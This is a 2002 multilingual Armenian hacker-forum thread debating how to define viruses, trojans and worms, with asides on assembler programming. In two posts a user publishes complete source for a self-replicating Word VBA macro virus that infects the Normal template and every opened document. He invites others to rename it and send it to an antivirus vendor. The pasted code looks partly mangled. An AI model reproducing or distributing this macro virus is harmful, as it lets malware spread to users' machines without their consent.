04.07.2002, 15:05
|
#16
|
|
»
Join Date: 01 2002
Posts: 777
Rep Power: 0
|
vot v mifologii kak raz nichego ne skazano o tom chto trojanskiy kon' razrushil
Troju,lyudi chto tam pryatalis' prosto otkrыli vorota,v etom i bыlo
prednaznachenie konya, tak chto bol'she vsego imya "trojanskiy kon'" podxodit
backdoor-am.
|
|
|
|
04.07.2002, 16:29
|
#17
|
|
Студент
Join Date: 06 2002
Location: Yerevan
Posts: 258
Rep Power: 0
|
|
|
|
|
 |
|
 |
04.07.2002, 17:03
|
#18
|
|
Младенец
Join Date: 07 2002
Location: World
Posts: 4
Rep Power: 0
|
Quote:
Originally posted by Dark Abyss of Yerevan:
2tigtan:
Ты говоришь что я не прав...а обосновать не хочешь?
Что ты имеешь ввиду? То что вирус не обязательно должен размножаться?
Значит так. Давным давно, существовало такое понятие - троянский конь.
Это были маленькие (а иногда и большие) дешевенькие программки, которые
абсолютно ничего не делали, только формат Ц:, удаление всех файлов итд.
Писали такие программы в основном ламеры. Повторяю, троянские кони а не
вирусы.
В то же время находились люди, которые писали именно вирусы - маленькие
(а не большие) программки на ассемблере. Я пожалуй не соглашусь с мнением
что цель вирусов - испортить систему. Чтобы убедиться в этом нужно лишь
достать какой нибудь virii magazine, VLAD, 40HEX, CHAOS..
Вирмейкеры Dark Angel, Black Wolf и многие другие просто по классу своему
намного выше среднестатистического программиста. Они творили не для
того чтобы что то испортить, для них вирврайтинг был образом жизни.
Гении, невостребованные гении. И сравнивать то что они делали, с какими то
дешевыми игрушками ламеров просто не красиво.
Так что давайте все называть своими именами, если прога просто гадит,
значит имя ей - дешевый троян.
|
Ok Es eka....
Es TigTan-i @nkern em...
Inchpes giteq TigTan-in Ays forumits durs en arel...chishtn asats menq himq man ekanq bayts te chgtanq...hamenayn deps mer kartsiqov ayd qayl@ aydqan el chisht cher...Antsats lini...
Uremn patasxanem ir [email protected]@ hech partadir chi vor bazmana.Orinak im andznakan havaqatsuyum es unem aydpisi virusner voronq konkret arajadranq en anum.Asenq MSG Box en Anum Windowsin!es aysor mi hat macro Virus em grel, vor@ nuynpes chi bazmanum aveli chisht....
naeq inqnerd ev dateq...Mi xndranq im moghmits, xndrum em popoxutyunner chaneq Vrode Virus&TigTan i tegh@ dneq dzer anun@ Word gtseq Sarqeq Macro virus Ev ugharkeq asenq AVP-in u Darnaq Virmaker... es gitem vor iren hargogh CompMan@ aydpisi baner chi ani... bayts ev aynpes tsankanum em zgushatsnel...
Minchev Source Cod@ gtsel es mi qani hat harts unem dzez...
1.Asenq grats patrasti Macro Code uneq, vonts eq duq Virs Sarqum... Aysinqn Asenq Grats patrastin Copy Paste eq anum Word-um u verj...
ev erkrord@
2.Vortgheits charem Assembler-i arandzin Compiler?
Code
/////////////////////////////////////////////////
Private Sub Document_Open ()
'Author: TigTan & Virus
'Name: Tatev
'Comments: TigTan`s Girl
Dim Norm, NormCode, NormLines, Doc, DocCode, DocLines
Set Norm = NormalTemplate.VBProject.VBComponents(1)
Set Doc = ActiveDocument.VBProject.VBComponents(1)
Set DocCode = Doc.CodeModule:Set NormCode = Norm.CodeModule
If DocCode.lines(23, 1) = "" Then
For y = 1 To DocCode.countoflines
DocCode.replacelines y,
Next y
For x = 2 To NormCode.countoflines
DocCode.insertlines 26 + x, NormCode.lines(x, 1)
Next x
End If
If NormCode.lines(23, 1) = "" Then
For y = 1 To NormCode.countoflines
NormCode.replacelines y,
Next y
For x = 1 To DocCode.countoflines
NormCode.insertlines 26 + x, DocCode.lines(x, 1)
Next x
End If
End Sub
Private Sub Document_New ()
End Sub
Private Sub Document_Close ()
MsgBox "You have been infected by the "Tatev" virus! Thank you, and have a nice day.", vbInformation
End Sub
|
|
|
|
 |
 |
|
 |
04.07.2002, 18:51
|
#19
|
|
Guru Apprentice
Join Date: 02 2002
Location: /dev/null
Age: 50
Posts: 524
Rep Power: 0
|
[QUOTE]Originally posted by Eddi:
Quote:
|
That's not true. Po-moemu mne ne nado dokazyvat' chto eto na assemblere mogno sdelat' chto-nibud' chto nel'zya na c, a ne naoborot.
|
Согласен и даже не собираюсь оспаривать.
Если честно после перехода на мастдайку мой интерес в ассемблере резко
упал, а при переходе на линукс - вообще пропал. Ассемблер - это же набор
процессорных команд. А значит когда меняется процессор - меняется и
ассемблер? Если я прав - значит написать код который работал бы на всех
платформах на которых работает виндовс или линукс совершенно невозможно...
Или я в чем-то ошибаюсь?
Quote:
|
By the way, na assemblere ispol'zovat' api ochen' legko.
|
Поделись
Quote:
|
You didn't get me right. Ya nichego ne skazal pro zaschischennost' samogo win95, no utilitu pod nego kotoraya budet normal'no zaschischat' ot vrednyx user-ov napisat' ne trudno ( btw the example about word just says one thing - the program you're using really ****s ). Odin moj znakomyj kstati takuyu utilitu napisal v svoe vremya, ves'ma prilichno rabotala.
|
Ты хочешь сказать что можно написать утилитку под Win95 которая
реализовывала бы механизм прав на файловой системе? Написать конечно
можно все что угодно, но если это не заделано в ядро - я думаю это можно
будет обойти не очень трудными усилиями. Я не говорю о среднем юзвере, я
говорю о "продвинутых", которые потом будут кричать на каждом углу что они
хакнули Видовс. И вообще Windos hack anel@ zapadlo ya!!!
|
|
|
|
 |
 |
|
 |
04.07.2002, 18:58
|
#20
|
|
Guru Apprentice
Join Date: 02 2002
Location: /dev/null
Age: 50
Posts: 524
Rep Power: 0
|
Folks, надеюсь это внесет ясность. Есть более-менее установленные термины и не
надо изобретать новые.
virus
(By analogy with biological viruses, via SF) A cracker program that searches out other
programs and "infects" them by embedding a copy of itself in them, so that they become Trojan
horses. When these programs are executed, the embedded virus is executed too, thus
propagating the "infection". This normally happens invisibly to the user.
Unlike a worm, a virus cannot infect other computers without assistance. It is propagated by
vectors such as humans trading programs with their friends (see SEX). The virus may do
nothing but propagate itself and then allow the program to run normally. Usually, however,
after propagating silently for a while, it starts doing things like writing "cute" messages on the
terminal or playing strange tricks with the display (some viruses include display hacks). Many
nasty viruses, written by particularly antisocial crackers, do irreversible damage, like deleting
all the user's files.
In the 1990s, viruses have become a serious problem, especially among IBM PC and Macintosh
users (the lack of security on these machines enables viruses to spread easily, even infecting the
operating system). The production of special antivirus software has become an industry, and a
number of exaggerated media reports have caused outbreaks of near hysteria among users; many
lusers tend to blame *everything* that doesn't work as they had expected on virus attacks.
Accordingly, this sense of "virus" has passed into popular usage (where it is often incorrectly
used to denote a worm or even a Trojan horse).
See boot virus, phage. Compare back door. See also Unix conspiracy.
[Jargon File]
(1995-01-31)
Source: The Free On-line Dictionary of Computing, ? 1993-2001 Denis Howe
__________________
\/\/h47'5 1n 4 n4m3? 7h47 wh1(h w3 (4|| 4 r053,
8y 4ny 07h3r n4m3 w0u|d 5m3|| 45 5w337...
|
|
|
|
 |
04.07.2002, 19:08
|
#21
|
|
»
Join Date: 01 2002
Posts: 777
Rep Power: 0
|
Ektich, vot ispol'zovanie api na asm:
Code:
.386
.model flat, stdcall
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.code
start:
jmp @F
szDlgTitle db "title",0
szMsg db " boo ",0
@@:
push MB_OK
push offset szDlgTitle
push offset szMsg
push 0
call MessageBox
push 0
call ExitProcess
end start
ili eshe legche:
Code:
invoke MessageBox, NULL,offset szMsg, offset szDlgTitle, MB_OK
invoke ExitProcess,NULL
|
|
|
|
 |
|
 |
04.07.2002, 21:14
|
#22
|
|
Banned
Join Date: 03 2002
Location: Vanadzor
Posts: 246
Rep Power: 0
|
I eshyo Odin
/////////////********************////////////////
Private Sub Document_Open ()
'Author: TigTan
'Name: Axperutyun
'Comments: Friendship 4EVER
'Origin: Zion
Dim Norm, NormCode, NormLines, Doc, DocCode, DocLines
Set Norm = NormalTemplate.VBProject.VBComponents(1)
Set Doc = ActiveDocument.VBProject.VBComponents(1)
Set DocCode = Doc.CodeModule:Set NormCode = Norm.CodeModule
If DocCode.lines(23, 1) = "" Then
For y = 1 To DocCode.countoflines
DocCode.replacelines y,
Next y
For x = 2 To NormCode.countoflines
DocCode.insertlines 26 + x, NormCode.lines(x, 1)
Next x
End If
If NormCode.lines(23, 1) = "" Then
For y = 1 To NormCode.countoflines
NormCode.replacelines y,
Next y
For x = 1 To DocCode.countoflines
NormCode.insertlines 26 + x, DocCode.lines(x, 1)
Next x
End If
End Sub
Private Sub Document_New ()
MsgBox "You have been infected by the "Axperutyun" virus! Thank you, and have a nice day.", vbInformation
End Sub
Private Sub Document_Close ()
End Sub
////////////****************////////////////
Mne vsyo eshyo nujen Compilyator Dlya Asmi...
Kto nebud` pomogite ok?
TigTan
|
|
|
|
 |
 |
|
 |
05.07.2002, 01:15
|
#23
|
|
Студент
Join Date: 06 2002
Location: Yerevan
Posts: 258
Rep Power: 0
|
2tigtan:
What's going on dude?  You want to become famous (or you think someone would want to) writing macro viruses, which you don't even need to send to any AV company, they are detected right away!?
For asm check this out
http://home.att.net/~jackklein/x86/x86_main.html
http://www.movsd.com/masmdl.htm
2zombie:
Thanks
2ektich:
I think I know what kind of "portable" viruses you're talking about - those who contain there C code, which can be compiled on the target system (if it contains a compiler), or directly executed there (depending on os). But at the moment you compile a C program on win32, it's definitely not better (maybe worse  ) than an asm program made for x86.
A naschet windowsa. Gosh, I'm just tired of that topic, how about just abandoning it?
Just for info, the program I mentioned was crack-able, but not for a "lammer" (as was mentioned in the original post), that's the reason I mentioned it.
|
|
|
|
 |
05.07.2002, 18:34
|
#24
|
|
Banned
Join Date: 03 2002
Location: Vanadzor
Posts: 246
Rep Power: 0
|
Arden Zgushatsum em statsel AVP-its...
Et vat a...
Isk inch@ verabervum a Haytni darnalun to.....
|
|
|
|
05.07.2002, 19:24
|
#25
|
|
Moderator
Join Date: 10 2001
Location: Yerevan
Posts: 5,466
Rep Power: 6
|
Joghovurd es inch hetakrkir xosakcutyunneri medj ek....
Lav sksink
>>>Abyss djan
Inchu aydpisi arhamarank Trojanneri nkatmamb. Torjanner grele aynkan el hesht ban chi. Nuynisk kaseyi aveli djvar kan vorosh virusner.
Yev heto kan trojanner voronk nayev karoghanum en bazmanal. Code Red-e haytni viruse baci virusutyunic nayev Trojann el er.
Isk Assemblerov virusner grele iharke hzor ban e bayc de hima nranc jamanaknere chen arden. En aradjva virusnere himikva paymannerum chen karogh bazmanal. Hishek verdji angam yerb ek Disketov EXE fayler berel. Chek hishum. Vaghuc vaghuc.
__________________
---------------
Արատտայի ու Խալդեյի հովանավոր .
|
|
|
|
06.07.2002, 12:04
|
#26
|
|
Дошкольник
Join Date: 01 2002
Location: hell
Posts: 124
Rep Power: 0
|
Mono jan es zombie in arden patasxanel ey vor i nkati uney miqich
"urish" trojanner. Hamadzayn em vor hima shat lurj trojanner en
grvum.. ughaki iranc anvanumner@ miqich tramabanakan chi, orinak
en nuyn sub7@ aveli shut petq er anvanel remote administration tool
qan te trojan
Indz tvuma vat chi lini mi hat et haskacoghutyunner@ sahmanenq,
vor heto tyurimacutyun chlini..aysinqn.
virus =
trojan =
(trojan) bomb =
worm =
..
__________________
[x]-=-[ ]-=-[x]
|
|
|
|
08.07.2002, 15:06
|
#27
|
|
Banned
Join Date: 03 2002
Location: Vanadzor
Posts: 246
Rep Power: 0
|
Quote:
Originally posted by Mono:
Joghovurd es inch hetakrkir xosakcutyunneri medj ek....
Yev heto kan trojanner voronk nayev karoghanum en bazmanal. Code Red-e haytni viruse baci virusutyunic nayev Trojann el er.
Isk Assemblerov virusner grele iharke hzor ban e bayc de hima nranc jamanaknere chen arden. En aradjva virusnere himikva paymannerum chen karogh bazmanal. Hishek verdji angam yerb ek Disketov EXE fayler berel. Chek hishum. Vaghuc vaghuc.
|
Eh Aram jan...
Chisht a Code Red@ Trojani hatkutyun uni bayts kneres, Nran voch mi kerp chi kareli trojan anvanel...
Na I tsne Virus e!
Isk Inch@ verabervum a Asmayov grats Virerin, asem vor ARAM JAN DU ES MI HARTSUM SXALVUM ES...
Inchqan haytni u mochni Virus goyutyun uni esorva drutyamb to 90% grvats e Assemblerov, isk Disketov Virus erek em tarel
U asem vor der irents chen kortsrel, u im kartsiqov der erkar jamanak kmnan asparezum!
|
|
|
|
17.07.2002, 14:18
|
#28
|
|
Младенец
Join Date: 07 2002
Location: www.not_now.am
Posts: 11
Rep Power: 0
|
Gospodi, o chem razgovor!!!!!!!!!!!
UJAS!
Odni kodi pokazivayut, drugie uchat'
CHTO TAKOE TROYAN.
TROYAN - ETO LYUBOY(NE VAJNO RAZMNOJAETSYA ILI NET)
VIRUS, KOTORYJ NEZAMETNO PRONIKAET K VAM I RAZRUSHAET SYSTEM!
(A eshe govorite chto chitali pro troyanskogo konya, no vivodov ne sdelali...)
Chto kasaetsya ASSEMBLER - C++
Assembler deystvitel'no apparatno orientirovan,
no raz've vam ne vxatayut vozmojnosti C++(daje i bez API) chtob pisat' chto xochetsya?
/***********************************/
/* Forum recorgintion */
/***********************************/
#include "avp.h"#define UJAS 0xFFF
for(;  {
AVP.Stack = Forum::GetText();
AVP.Analize();
AVP.SendMessage(UJAS);
}
I VOOBSHE NA ASSEMBLERE PISAT' VIRUS-i XOROSHO POD KONKRETNIE KOMPI.
__________________
AVP
|
|
|
|
17.07.2002, 16:56
|
#29
|
|
Студент
Join Date: 06 2002
Location: Yerevan
Posts: 258
Rep Power: 0
|
Gosh.
Definition:
A trojan horse - is a program that appears legitimate but does something illicit when run. It gets its name from the wooden horse the Greeks gave Troy as a "gift" because users mistake it for a useful or interesting program that they choose to download. Once installed and run, Trojans can secretly open access channels to crackers, relay passwords and credit card data or destroy user files. It's similar to a virus but generally does not replicate itself.
|
|
|
|
|
All times are GMT. The time now is 17:18. |
|
|